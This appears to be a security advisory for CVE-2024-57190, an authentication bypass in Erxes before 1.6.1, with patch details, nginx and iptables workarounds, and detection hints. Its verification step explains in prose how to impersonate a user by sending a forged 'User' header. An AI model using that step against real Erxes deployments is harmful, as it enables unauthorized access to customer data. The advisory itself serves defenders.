CVE-2024-57190
📋 TL;DR
CVE-2024-57190 is an authentication bypass vulnerability in Erxes that allows attackers to impersonate any user by sending a malicious HTTP header. This affects all Erxes deployments running versions before 1.6.1, enabling unauthorized access to GraphQL endpoints and potentially sensitive data.
💻 Affected Systems
- Erxes
📦 What is this software?
Erxes by Erxes
⚠️ Risk & Real-World Impact
Worst Case
Complete system compromise where attackers can access all user data, modify configurations, execute arbitrary operations through GraphQL endpoints, and potentially pivot to other systems.
Likely Case
Unauthorized data access and manipulation, including viewing sensitive customer information, modifying business logic, and privilege escalation within the Erxes platform.
If Mitigated
Limited impact with proper network segmentation and monitoring, but still potential for data exposure if the vulnerability is exploited.
🎯 Exploit Status
Exploitation requires only HTTP header manipulation, making it trivial for attackers with network access to the service.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.6.1
Vendor Advisory: https://github.com/erxes/erxes/commit/4ed2ca797241d2ba0c9083feeadd9755c1310ce8
Restart Required: Yes
Instructions:
1. Backup your Erxes installation and data. 2. Update to Erxes version 1.6.1 or later. 3. Restart all Erxes services. 4. Verify the fix by testing authentication mechanisms.
🔧 Temporary Workarounds
Web Application Firewall Rule
allBlock or sanitize User HTTP headers at the WAF or reverse proxy level
# Example nginx configuration:
location / {
proxy_set_header User "";
proxy_pass http://erxes_backend;
}
Network Segmentation
linuxRestrict access to Erxes GraphQL endpoints to trusted networks only
# Example iptables rule:
iptables -A INPUT -p tcp --dport 3000 -s 10.0.0.0/8 -j ACCEPT
iptables -A INPUT -p tcp --dport 3000 -j DROP
🧯 If You Can't Patch
- Implement strict network access controls to limit who can reach the Erxes GraphQL endpoints
- Deploy a WAF or reverse proxy that strips or validates the User HTTP header before it reaches Erxes
🔍 How to Verify
Check if Vulnerable:
Send an HTTP request to any GraphQL endpoint with a User header containing any username. If the request succeeds without proper authentication, the system is vulnerable.Check Version:
Check the Erxes version in the admin panel or run: docker inspect erxes | grep -i versionVerify Fix Applied:
Attempt the same exploit after patching. Requests with malicious User headers should be rejected or properly authenticated.📡 Detection & Monitoring
Log Indicators:
- Unusual User header values in HTTP logs
- GraphQL requests from unexpected IP addresses or users
- Authentication failures followed by successful requests with different User headers
Network Indicators:
- HTTP requests containing User headers with suspicious values
- GraphQL queries from unauthenticated sources
SIEM Query:
source="erxes" AND (http_header="User:*" AND NOT http_user_agent="normal-user-agent")